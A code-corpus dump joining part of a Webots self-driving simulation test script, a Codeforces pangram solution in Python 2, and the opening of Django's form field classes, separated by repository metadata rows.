y_ctr2 = -20.0
st = math.floor((math.pi*r_curv)/x_step) # steps to take in the curved part
# 1st part
for i in np.arange(x1,x2,-x_step):
gp = []
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([i,y1+round(j,2),math.pi])
grid_points.append(gp)
# 2nd part
for i in range(st):
gp = []
theta = i*x_step/r_curv
x_cur = x_ctr1 - r_curv*math.sin(theta)
y_cur = y_ctr1 + r_curv*math.cos(theta)
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([round(x_cur+j*math.sin(theta),2),round(y_cur-j*math.cos(theta),2),math.pi+theta])
grid_points.append(gp)
# 3rd part
for i in np.arange(x2,x1,x_step):
gp = []
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([i,y2+round(j,2),0.0])
grid_points.append(gp)
# 4th part
for i in range(st):
gp = []
theta = i*x_step/r_curv
x_cur = x_ctr2 + r_curv*math.sin(theta)
y_cur = y_ctr2 - r_curv*math.cos(theta)
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([round(x_cur+j*math.sin(theta),2),round(y_cur-j*math.cos(theta),2),theta])
grid_points.append(gp)
#-----------Solve the circularity problem with theta------------------------
# print(grid_points[0][9])
travel_path = []
total_steps = 1000
p = []
c = []
X = round(2*w/y_step)
Y = len(grid_points)
for j in range(Y):
k = []
f = []
for i in range(X):
k.append(inf)
f.append((-1,-1))
c.append(k)
p.append(f)
c[0][9] = 0.0
for i in range(Y-1):
for j in range(X):
m1 = max(0,j-3)
m2 = min(X-1,j+3)
for k in range(m1,m2+1):
cur_cost = 0;
cur_cost = cost(c[i][j],grid_points[i][j],grid_points[i+1][k],abs(k-9)*0.4)
if(c[i+1][k] > cur_cost):
c[i+1][k] = cur_cost
p[i+1][k] = (i,j)
i= Y-1
j = 9
# print(type(grid_points[0][0][0]))
while(p[i][j]!=(-1,-1)):
travel_path = [[float(grid_points[i][j][0]),float(grid_points[i][j][1])]] + travel_path
(i,j) = p[i][j]
return travel_path
def run_test(ego_init_speed_m_s=10.0, ego_x_pos=20.0, pedestrian_speed=3.0, sim_duration=24000, for_matlab=False):
"""Runs a test with the given arguments"""
sim_environment = SimEnvironment()
# --- Add road
# road = WebotsRoad(number_of_lanes=3)
# road.rotation = [0, 1, 0, -math.pi / 2]
# road.position = [500, 0.02, 0]
# road.length = 500.0
# sim_environment.road_list.append(road)
# ----- Define VEHICLES:
# Ego vehicle
vhc_obj = WebotsVehicle()
vhc_obj.current_position = [500.0, 0.35, 0.0]
vhc_obj.current_orientation = math.pi/2
vhc_obj.rotation = [0.0, 1.0, 0.0, vhc_obj.current_orientation]
vhc_obj.current_orientation = -math.pi/2.0
vhc_obj.rotation = [0.0, 1.0, 0.0, -math.pi/2.0]
vhc_obj.vhc_id = 1
vhc_obj.color = [1.0, 0.0, 0.0]
vhc_obj.set_vehicle_model('TeslaModel3')
vhc_obj.controller = 'automated_driving_with_fusion2'
vhc_obj.is_controller_name_absolute = True
vhc_obj.controller_arguments.append('Toyota')
vhc_obj.controller_arguments.append('70.0')
vhc_obj.controller_arguments.append('0.0')
vhc_obj.controller_arguments.append('1')
vhc_obj.controller_arguments.append('True')
vhc_obj.controller_arguments.append('False')
vhc_obj.controller_arguments.append('0')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Receiver'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"receiver"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Compass'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"compass"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'GPS'
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Radar' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.FRONT
vhc_obj.sensor_array[-1].add_sensor_field('name', '"radar"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Camera' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.TOP
vhc_obj.sensor_array[-1].add_sensor_field('name', '"camera"')
# sim_environment.ego_vehicles_list.append(vhc_obj)
#############################################
vhc_obj = WebotsVehicle()
vhc_obj.current_position = [200.0, 0.35, 0.0]
vhc_obj.current_orientation = 0.0
vhc_obj.rotation = [0.0, 1.0, 0.0, -math.pi/2]
vhc_obj.vhc_id = 1
vhc_obj.set_vehicle_model('TeslaModel3')
vhc_obj.color = [1.0, 0.0, 0.0]
vhc_obj.controller = 'automated_driving_with_fusion2'
vhc_obj.controller_arguments.append('25.0')
vhc_obj.controller_arguments.append('True')
vhc_obj.controller_arguments.append('3.5')
vhc_obj.controller_arguments.append('1')
vhc_obj.controller_arguments.append('False')
vhc_obj.controller_arguments.append('False')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Receiver'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"receiver"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Compass'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"compass"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'GPS'
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Camera' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.TOP
vhc_obj.sensor_array[-1].add_sensor_field('name', '"camera"')
# sim_environment.ego_vehicles_list.append(vhc_obj)
# sim_environment.agent_vehicles_list.append(vhc_obj)
# ----- Agent vehicles
# Agent:
vhc_obj = WebotsVehicle()
vhc_obj.current_position = [420.0, 0.35, 0.0]
vhc_obj.current_orientation = 0.0
vhc_obj.rotation = [0.0, 1.0, 0.0, -math.pi/2]
vhc_obj.vhc_id = 2
vhc_obj.set_vehicle_model('TeslaModel3')
vhc_obj.color = [1.0, 0.0, 0.0]
vhc_obj.controller = 'path_and_speed_follower'
vhc_obj.controller_arguments.append('25.0')
vhc_obj.controller_arguments.append('True')
vhc_obj.controller_arguments.append('3.5')
vhc_obj.controller_arguments.append('2')#vhc_id
vhc_obj.controller_arguments.append('False')
vhc_obj.controller_arguments.append('False')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Receiver'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"receiver"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Compass'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"compass"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'GPS'
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Radar' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.FRONT
vhc_obj.sensor_array[-1].add_sensor_field('name', '"radar"')
sim_environment.agent_vehicles_list.append(vhc_obj)
# ----- Define PEDESTRIANS:
# Pedestrian 1
# pedestrian = WebotsPedestrian()
# pedestrian.ped_id = 1
# pedestrian.current_position = [50.0, 1.3, 0.0]
# pedestrian.shirt_color = [0.0, 0.0, 0.0]
# pedestrian.pants_color = [0.0, 0.0, 1.0]
# pedestrian.target_speed = pedestrian_speed
# pedestrian.trajectory = [50.0, 0.0, 80.0, -3.0, 200.0, 0.0]
# pedestrian.controller = 'pedestrian_control'
# sim_environment.pedestrians_list.append(pedestrian)
# ----- Fog:
# sim_environment.fog = WebotsFog()
# sim_environment.fog.visibility_range = 700.0
# ----- Road Disturbances:
# road_disturbance = WebotsRoadDisturbance()
# road_disturbance.disturbance_type = WebotsRoadDisturbance.TRIANGLE_DOUBLE_SIDED
# road_disturbance.rotation = [0, 1, 0, -math.pi / 2.0]
# road_disturbance.position = [40, 0, 0]
# road_disturbance.width = 3.5
# road_disturbance.length = 3
# road_disturbance.height = 0.04
# road_disturbance.inter_object_spacing = 0.5
# sim_environment.road_disturbances_list.append(road_disturbance)
# ----- Stop sign:
# sim_obj = WebotsSimObject()
# sim_obj.object_name = 'StopSign'
# sim_obj.object_parameters.append(('translation', '40 0 6'))
# sim_obj.object_parameters.append(('rotation', '0 1 0 1.5708'))
# sim_environment.generic_sim_objects_list.append(sim_obj)
# ----- Initial State Configurations:
sim_environment.initial_state_config_list.append(
InitialStateConfig(item=ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=0,
item_state_index=WebotsVehicle.STATE_ID_VELOCITY_X),
value=ego_init_speed_m_s))
# ----- Controller Parameters:
# Ego Target Path:
target_pos_list = [[450.0, 0.0],
[-400.0, 0.0]]
# target_pos_list = [[450.0, 0.0], [445.0, 0.0], [440.0, 0.0], [435.0, 0.0], [430.0, 0.0], [425.0, 0.0], [420.0, 0.0], [415.0, 0.0], [410.0, 0.0], [405.0, 0.0], [400.0, 0.9], [395.0, 3.6], [390.0, 3.6], [385.0, 3.6], [380.0, 0.9], [375.0, 0.0], [370.0, 0.0], [365.0, 0.0], [360.0, 0.0], [355.0, 0.0], [350.0, 0.0], [345.0, 0.0], [340.0, 0.0], [335.0, 0.0], [330.0, 0.0], [325.0, 0.0], [320.0, 0.0], [315.0, 0.0], [310.0, 0.0], [305.0, 0.0], [300.0, 0.0], [295.0, 0.0], [290.0, 0.0], [285.0, 0.0], [280.0, 0.0], [275.0, 0.0], [270.0, 0.0], [265.0, 0.0], [260.0, 0.0], [255.0, 0.0], [250.0, 0.0], [245.0, 0.0], [240.0, 0.0], [235.0, 0.0], [230.0, 0.0], [225.0, 0.0], [220.0, 0.0], [215.0, 0.0], [210.0, 0.0], [205.0, 0.0], [200.0, 0.0], [195.0, 0.0], [190.0, 0.0], [185.0, 0.0], [180.0, 0.0], [175.0, 0.0], [170.0, 0.0], [165.0, 0.0], [160.0, 0.0], [155.0, 0.0], [150.0, 0.0], [145.0, 0.0], [140.0, 0.0], [135.0, 0.0], [130.0, 0.0], [125.0, 0.0], [120.0, 0.0], [115.0, 0.0], [110.0, 0.0], [105.0, 0.0], [100.0, 0.0], [95.0, 0.0], [90.0, 0.0], [85.0, 0.0], [80.0, 0.0], [75.0, 0.0], [70.0, 0.0], [65.0, 0.0], [60.0, 0.0], [55.0, 0.0], [50.0, 0.0], [45.0, 0.0], [40.0, 0.0], [35.0, 0.0], [30.0, 0.0], [25.0, 0.0], [20.0, 0.0], [15.0, 0.0], [10.0, 0.0], [5.0, 0.0], [-0.0, 0.0], [-4.95, -0.62], [-9.59, -2.45], [-13.63, -5.37], [-16.83, -9.19], [-18.98, -13.69], [-19.95, -18.59], [-19.68, -23.56], [-18.19, -28.32], [-15.56, -32.56], [-11.97, -36.02], [-7.63, -38.49], [-2.82, -39.8], [0.0, -40.0], [5.0, -40.0], [10.0, -40.0], [15.0, -40.0], [20.0, -40.0], [25.0, -40.0], [30.0, -40.0], [35.0, -40.0], [40.0, -40.0], [45.0, -40.0], [50.0, -40.0], [55.0, -40.0], [60.0, -40.0], [65.0, -40.0], [70.0, -40.0], [75.0, -40.0], [80.0, -40.0], [85.0, -40.0], [90.0, -40.0], [95.0, -40.0], [100.0, -40.0], [105.0, -40.0], [110.0, -40.0], [115.0, -40.0], [120.0, -40.0], [125.0, -40.0], [130.0, -40.0], [135.0, -40.0], [140.0, -40.0], [145.0, -40.0], [150.0, -40.0], [155.0, -40.0], [160.0, -40.0], [165.0, -40.0], [170.0, -40.0], [175.0, -40.0], [180.0, -40.0], [185.0, -40.0], [190.0, -40.0], [195.0, -40.0], [200.0, -40.0], [205.0, -40.0], [210.0, -40.0], [215.0, -40.0], [220.0, -40.0], [225.0, -40.0], [230.0, -40.0], [235.0, -40.0], [240.0, -40.0], [245.0, -40.0], [250.0, -40.0], [255.0, -40.0], [260.0, -40.0], [265.0, -40.0], [270.0, -40.0], [275.0, -40.0], [280.0, -40.0], [285.0, -40.0], [290.0, -40.0], [295.0, -40.0], [300.0, -40.0], [305.0, -40.0], [310.0, -40.0], [315.0, -40.0], [320.0, -40.0], [325.0, -40.0], [330.0, -40.0], [335.0, -40.0], [340.0, -40.0], [345.0, -40.0], [350.0, -40.0], [355.0, -40.0], [360.0, -40.0], [365.0, -40.0], [370.0, -40.0], [375.0, -40.0], [380.0, -40.0], [385.0, -40.0], [390.0, -40.0], [395.0, -40.0], [400.0, -40.0], [405.0, -40.0], [410.0, -40.0], [415.0, -40.0], [420.0, -40.0], [425.0, -40.0], [430.0, -40.0], [435.0, -40.0], [440.0, -40.0], [445.0, -40.0], [450.0, -40.0], [455.0, -40.0], [460.0, -40.0], [465.0, -40.0], [470.0, -40.0], [475.0, -40.0], [480.0, -40.0], [485.0, -40.0], [490.0, -40.0], [495.0, -40.0], [500.0, -40.0], [504.95, -39.38], [509.59, -37.55], [513.63, -34.63], [516.83, -30.81], [518.98, -26.31], [519.95, -21.41], [519.68, -16.44], [518.19, -11.68], [515.56, -7.44], [511.97, -3.98], [507.63, -1.51], [502.82, -0.2], [500.0, 0.0], [495.0, 0.0], [490.0, 0.0], [485.0, 0.0], [480.0, 0.0], [475.0, 0.0], [470.0, 0.0], [465.0, 0.0], [460.0, 0.0], [455.0, 0.0], [450.0, 0.0], [445.0, 0.0], [440.0, 0.0], [435.0, 0.0], [430.0, 0.0], [425.0, 0.0], [420.0, 0.0], [415.0, 0.0], [410.0, 0.0], [405.0, 0.0], [400.0, 0.0], [395.0, 0.0], [390.0, 0.0], [385.0, 0.0], [380.0, 0.0], [375.0, 0.0], [370.0, 0.0], [365.0, 0.0], [360.0, 0.0], [355.0, 0.0], [350.0, 0.0], [345.0, 0.0], [340.0, 0.0], [335.0, 0.0], [330.0, 0.0], [325.0, 0.0], [320.0, 0.0], [315.0, 0.0], [310.0, 0.0], [305.0, 0.0], [300.0, 0.0], [295.0, 0.0], [290.0, 0.0], [285.0, 0.0], [280.0, 0.0], [275.0, 0.0], [270.0, 0.0], [265.0, 0.0], [260.0, 0.0], [255.0, 0.0], [250.0, 0.0], [245.0, 0.0], [240.0, 0.0], [235.0, 0.0], [230.0, 0.0], [225.0, 0.9], [220.0, 3.6], [215.0, 3.6], [210.0, 0.9], [205.0, 0.0], [200.0, 0.0], [195.0, 0.0], [190.0, 0.0], [185.0, 0.0], [180.0, 0.0], [175.0, 0.0], [170.0, 0.0]]
for target_pos in target_pos_list:
sim_environment.controller_params_list.append(
WebotsControllerParameter(vehicle_id=2,
parameter_name='target_position',
parameter_data=target_pos))
# target_pos_list = computeTargetPath()
target_pos_list = [[520.0, 0.0] ,[500.0, 0.0], [495.0, 0.0], [490.0, 0.0], [485.0, 0.0], [480.0, 0.0], [475.0, 0.0], [470.0, 0.0], [465.0, 0.0], [460.0, 0.0], [455.0, 0.0], [450.0, 0.0], [445.0, 0.0], [440.0, 0.0], [435.0, 0.0], [430.0, 0.4], [425.0, 0.8], [420.0, 1.2], [415.0, 1.6], [410.0, 2.0], [405.0, 2.4], [400.0, 2.4], [395.0, 2.4], [390.0, 2.4], [385.0, 2.4], [380.0, 2.4], [375.0, 2.4], [370.0, 2.4], [365.0, 2.4], [360.0, 2.0], [355.0, 1.6], [350.0, 1.2], [345.0, 0.8], [340.0, 0.4], [335.0, 0.0], [330.0, 0.0], [325.0, 0.0], [320.0, 0.0], [315.0, 0.0], [310.0, 0.0], [305.0, 0.0], [300.0, 0.0], [295.0, 0.0], [290.0, 0.0], [285.0, 0.0], [280.0, 0.0], [275.0, 0.0], [270.0, 0.0], [265.0, 0.0], [260.0, 0.0], [255.0, 0.0], [250.0, 0.0], [245.0, 0.0], [240.0, 0.0], [235.0, 0.0], [230.0, 0.0], [225.0, 0.0], [220.0, 0.0], [215.0, 0.0], [210.0, 0.0], [205.0, 0.0], [200.0, 0.0], [195.0, 0.0], [190.0, 0.0], [185.0, 0.0], [180.0, 0.0], [175.0, 0.0], [170.0, 0.0], [165.0, 0.0], [160.0, 0.0], [155.0, 0.0], [150.0, 0.0], [145.0, 0.0], [140.0, 0.0], [135.0, 0.0], [130.0, 0.0], [125.0, 0.0], [120.0, 0.0], [115.0, 0.0], [110.0, 0.0], [105.0, 0.0]]
for target_pos in target_pos_list:
sim_environment.controller_params_list.append(
WebotsControllerParameter(vehicle_id=1,
parameter_name='target_position',
parameter_data=target_pos))
# ----- Heart Beat Configuration:
sim_environment.heart_beat_config = HeartBeatConfig(sync_type=HeartBeatConfig.WITHOUT_SYNC,
period_ms=2000)
# ----- View Follow configuration:
sim_environment.view_follow_config = \
ViewFollowConfig(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=0,
# position=[sim_environment.agent_vehicles_list[0].current_position[0] + 15.0,
# sim_environment.agent_vehicles_list[0].current_position[1] + 2.0,
# sim_environment.agent_vehicles_list[0].current_position[2]],
position=[515.0, 2.35, 0.0],
rotation=[0.0, -1.0, 0.0, -math.pi/2.0])
# ----- Data Log Configurations:
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_TIME, item_index=0, item_state_index=0))
for vhc_ind in range(len(sim_environment.ego_vehicles_list) + len(sim_environment.agent_vehicles_list)):
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_X))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_Y))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_ORIENTATION))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_SPEED))
for ped_ind in range(len(sim_environment.pedestrians_list)):
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_PEDESTRIAN,
item_index=ped_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_X))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_PEDESTRIAN,
item_index=ped_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_Y))
sim_environment.data_log_period_ms = 10
# ----- Create Trajectory dictionary for later reference:
sim_environment.populate_simulation_trace_dict()
sim_config = sim_config_tools.SimulationConfig(1)
sim_config.run_config_arr.append(sim_config_tools.RunConfig())
sim_config.run_config_arr[0].simulation_run_mode = SimData.SIM_TYPE_RUN
sim_config.sim_duration_ms = sim_duration
sim_config.sim_step_size = 10
sim_config.world_file = '../Webots_Projects/worlds/our_world.wbt'
sim_env_configurator = SimEnvironmentConfigurator(sim_config=sim_config)
(is_connected, simulator_instance) = sim_env_configurator.connect(max_connection_retry=3)
if not is_connected:
raise ValueError('Could not connect!')
sim_env_configurator.setup_sim_environment(sim_environment)
trajectory = sim_env_configurator.run_simulation_get_trace()
if for_matlab:
trajectory = experiment_tools.npArray2Matlab(trajectory)
time.sleep(1) # Wait for Webots to reload the world.
# print(trajectory)
# with open("out.csv","w") as f:
# wr = csv.writer(f)
# wr.writerows(trajectory)
return trajectory
def run_covering_array_tests():
"""Runs all tests from the covering array csv file"""
exp_file_name = 'TutorialExample_CA_2way.csv' # csv file containing the test cases
# Read all experiment into a table:
exp_data_frame = covering_array_utilities.load_experiment_data(exp_file_name, header_line_count=6)
# Decide number of experiments based on the number of entries in the table.
num_of_experiments = len(exp_data_frame.index)
trajectories_dict = {} # A dictionary data structure to keep simulation traces.
for exp_ind in range(num_of_experiments): # For each test case
# Read the current test case
current_experiment = covering_array_utilities.get_experiment_all_fields(
exp_data_frame, exp_ind)
# Read the parameters from the current test case:
ego_init_speed = float(
covering_array_utilities.get_field_value_for_current_experiment(
current_experiment, 'ego_init_speed'))
ego_x_position = float(
covering_array_utilities.get_field_value_for_current_experiment(
current_experiment, 'ego_x_position'))
pedestrian_speed = float(
covering_array_utilities.get_field_value_for_current_experiment(
current_experiment, 'pedestrian_speed'))
print('Running test case {} of {} with parameters: {}, {}, {}.'.format(exp_ind+1, num_of_experiments, ego_init_speed, ego_x_position, pedestrian_speed))
# Execute the test case and record the resulting simulation trace:
trajectories_dict[exp_ind] = run_test(ego_init_speed_m_s=ego_init_speed,
ego_x_pos=ego_x_position, pedestrian_speed=pedestrian_speed)
time.sleep(2) # Wait for Webots to reload the world.
return trajectories_dict
run_test()
# run_covering_array_tests()
| 51.494867
| 4,227
| 0.619069
|
acff7a0af94c0030ef39cd60884f419119d4f1ed
| 621
|
py
|
Python
|
problems/A/Pangram.py
|
deveshbajpai19/CodeForces
|
707b374f03012ec68054841f791d48b33ae4ef1b
|
[
"MIT"
] | 55
|
2016-06-19T05:45:15.000Z
|
2022-03-31T15:18:53.000Z
|
problems/A/Pangram.py
|
farhadcu/CodeForces-2
|
707b374f03012ec68054841f791d48b33ae4ef1b
|
[
"MIT"
] | null | null | null |
problems/A/Pangram.py
|
farhadcu/CodeForces-2
|
707b374f03012ec68054841f791d48b33ae4ef1b
|
[
"MIT"
] | 25
|
2016-07-29T13:03:15.000Z
|
2021-09-17T01:45:45.000Z
|
__author__ = 'Devesh Bajpai'
'''
https://codeforces.com/problemset/problem/520/A
Solution: Maintain a set of characters seen in the string. In the end, the size of that set should be 26 denoting all
characters were observed at least once in the string. Make sure we add characters in one case in the set to deal with
upper/lower case characters.
'''
def solve(n, string):
charSet = set()
for i in xrange(0, n):
charSet.add(string[i].lower())
return "YES" if len(charSet) == 26 else "NO"
if __name__ == "__main__":
n = int(raw_input())
string = raw_input()
print solve(n, string)
| 22.178571
| 117
| 0.68277
|
acff7a54a98abf24adcb1ffda1b7750d1532e474
| 46,816
|
py
|
Python
|
django/forms/fields.py
|
mbox/django
|
9f31d379a759ba76976a93bb3a39c460020ae124
|
[
"BSD-3-Clause"
] | null | null | null |
django/forms/fields.py
|
mbox/django
|
9f31d379a759ba76976a93bb3a39c460020ae124
|
[
"BSD-3-Clause"
] | null | null | null |
django/forms/fields.py
|
mbox/django
|
9f31d379a759ba76976a93bb3a39c460020ae124
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Field classes.
"""
from __future__ import unicode_literals
import copy
import datetime
import os
import re
import sys
import warnings
from decimal import Decimal, DecimalException
from io import BytesIO
from django.core import validators
from django.core.exceptions import ValidationError
from django.forms.utils import from_current_timezone, to_current_timezone
from django.forms.widgets import (
TextInput, NumberInput, EmailInput, URLInput, HiddenInput,
MultipleHiddenInput, ClearableFileInput, CheckboxInput, Select,
NullBooleanSelect, SelectMultiple, DateInput, DateTimeInput, TimeInput,
SplitDateTimeWidget, SplitHiddenDateTimeWidget, FILE_INPUT_CONTRADICTION
)
from django.utils import formats
from django.utils.encoding import smart_text, force_str, force_text
from django.utils.ipv6 import clean_ipv6_address
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils import six
from django.utils.six.moves.urllib.parse import urlsplit, urlunsplit
from django.utils.translation import ugettext_lazy as _, ungettext_lazy
# Provide this import for backwards compatibility.
from django.core.validators import EMPTY_VALUES # NOQA
__all__ = (
'Field', 'CharField', 'IntegerField',
'DateField', 'TimeField', 'DateTimeField',
'RegexField', 'EmailField', 'FileField', 'ImageField', 'URLField',
'BooleanField', 'NullBooleanField', 'ChoiceField', 'MultipleChoiceField',
'ComboField', 'MultiValueField', 'FloatField', 'DecimalField',
'SplitDateTimeField', 'IPAddressField', 'GenericIPAddressField', 'FilePathField',
'SlugField', 'TypedChoiceField', 'TypedMultipleChoiceField'
)
class Field(object):
widget = TextInput # Default widget to use when rendering this type of Field.
hidden_widget = HiddenInput # Default widget to use when rendering this as "hidden".
default_validators = [] # Default set of validators
# Add an 'invalid' entry to default_error_message if you want a specific
# field error message not raised by the field validators.
default_error_messages = {
'required': _('This field is required.'),
}
empty_values = list(validators.EMPTY_VALUES)
# Tracks each time a Field instance is created. Used to retain order.
creation_counter = 0
def __init__(self, required=True, widget=None, label=None, initial=None,
help_text='', error_messages=None, show_hidden_initial=False,
validators=[], localize=False):
# required -- Boolean that specifies whether the field is required.
# True by default.
# widget -- A Widget class, or instance of a Widget class, that should
# be used for this Field when displaying it. Each Field has a
# default Widget that it'll use if you don't specify this. In
# most cases, the default widget is TextInput.
# label -- A verbose name for this field, for use in displaying this
# field in a form. By default, Django will use a "pretty"
# version of the form field name, if the Field is part of a
# Form.
# initial -- A value to use in this Field's initial display. This value
# is *not* used as a fallback if data isn't given.
# help_text -- An optional string to use as "help text" for this Field.
# error_messages -- An optional dictionary to override the default
# messages that the field will raise.
# show_hidden_initial -- Boolean that specifies if it is needed to render a
# hidden widget with initial value after widget.
# validators -- List of addtional validators to use
# localize -- Boolean that specifies if the field should be localized.
self.required, self.label, self.initial = required, label, initial
self.show_hidden_initial = show_hidden_initial
self.help_text = help_text
widget = widget or self.widget
if isinstance(widget, type):
widget = widget()
# Trigger the localization machinery if needed.
self.localize = localize
if self.localize:
widget.is_localized = True
# Let the widget know whether it should display as required.
widget.is_required = self.required
# Hook into self.widget_attrs() for any Field-specific HTML attributes.
extra_attrs = self.widget_attrs(widget)
if extra_attrs:
widget.attrs.update(extra_attrs)
self.widget = widget
# Increase the creation counter, and save our local copy.
self.creation_counter = Field.creation_counter
Field.creation_counter += 1
messages = {}
for c in reversed(self.__class__.__mro__):
messages.update(getattr(c, 'default_error_messages', {}))
messages.update(error_messages or {})
self.error_messages = messages
self.validators = self.default_validators + validators
super(Field, self).__init__()
def prepare_value(self, value):
return value
def to_python(self, value):
return value
def validate(self, value):
if value in self.empty_values and self.required:
raise ValidationError(self.error_messages['required'], code='required')
def run_validators(self, value):
if value in self.empty_values:
return
errors = []
for v in self.validators:
try:
v(value)
except ValidationError as e:
if hasattr(e, 'code') and e.code in self.error_messages:
e.message = self.error_messages[e.code]
errors.extend(e.error_list)
if errors:
raise ValidationError(errors)
def clean(self, value):
"""
Validates the given value and returns its "cleaned" value as an
appropriate Python object.
Raises ValidationError for any errors.
"""
value = self.to_python(value)
self.validate(value)
self.run_validators(value)
return value
def bound_data(self, data, initial):
"""
Return the value that should be shown for this field on render of a
bound form, given the submitted POST data for the field and the initial
data, if any.
For most fields, this will simply be data; FileFields need to handle it
a bit differently.
"""
return data
def widget_attrs(self, widget):
"""
Given a Widget instance (*not* a Widget class), returns a dictionary of
any HTML attributes that should be added to the Widget, based on this
Field.
"""
return {}
def get_limit_choices_to(self):
"""
Returns ``limit_choices_to`` for this form field.
If it is a callable, it will be invoked and the result will be
returned.
"""
if callable(self.limit_choices_to):
return self.limit_choices_to()
return self.limit_choices_to
def _has_changed(self, initial, data):
"""
Return True if data differs from initial.
"""
# For purposes of seeing whether something has changed, None is
# the same as an empty string, if the data or inital value we get
# is None, replace it w/ ''.
initial_value = initial if initial is not None else ''
try:
data = self.to_python(data)
if hasattr(self, '_coerce'):
data = self._coerce(data)
except ValidationError:
return True
data_value = data if data is not None else ''
return initial_value != data_value
def __deepcopy__(self, memo):
result = copy.copy(self)
memo[id(self)] = result
result.widget = copy.deepcopy(self.widget, memo)
result.validators = self.validators[:]
return result
class CharField(Field):
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
self.max_length, self.min_length = max_length, min_length
super(CharField, self).__init__(*args, **kwargs)
if min_length is not None:
self.validators.append(validators.MinLengthValidator(int(min_length)))
if max_length is not None:
self.validators.append(validators.MaxLengthValidator(int(max_length)))
def to_python(self, value):
"Returns a Unicode object."
if value in self.empty_values:
return ''
return smart_text(value)
def widget_attrs(self, widget):
attrs = super(CharField, self).widget_attrs(widget)
if self.max_length is not None:
# The HTML attribute is maxlength, not max_length.
attrs.update({'maxlength': str(self.max_length)})
return attrs
class IntegerField(Field):
widget = NumberInput
default_error_messages = {
'invalid': _('Enter a whole number.'),
}
def __init__(self, max_value=None, min_value=None, *args, **kwargs):
self.max_value, self.min_value = max_value, min_value
if kwargs.get('localize') and self.widget == NumberInput:
# Localized number input is not well supported on most browsers
kwargs.setdefault('widget', super(IntegerField, self).widget)
super(IntegerField, self).__init__(*args, **kwargs)
if max_value is not None:
self.validators.append(validators.MaxValueValidator(max_value))
if min_value is not None:
self.validators.append(validators.MinValueValidator(min_value))
def to_python(self, value):
"""
Validates that int() can be called on the input. Returns the result
of int(). Returns None for empty values.
"""
value = super(IntegerField, self).to_python(value)
if value in self.empty_values:
return None
if self.localize:
value = formats.sanitize_separators(value)
try:
value = int(str(value))
except (ValueError, TypeError):
raise ValidationError(self.error_messages['invalid'], code='invalid')
return value
def widget_attrs(self, widget):
attrs = super(IntegerField, self).widget_attrs(widget)
if isinstance(widget, NumberInput):
if self.min_value is not None:
attrs['min'] = self.min_value
if self.max_value is not None:
attrs['max'] = self.max_value
return attrs
class FloatField(IntegerField):
default_error_messages = {
'invalid': _('Enter a number.'),
}
def to_python(self, value):
"""
Validates that float() can be called on the input. Returns the result
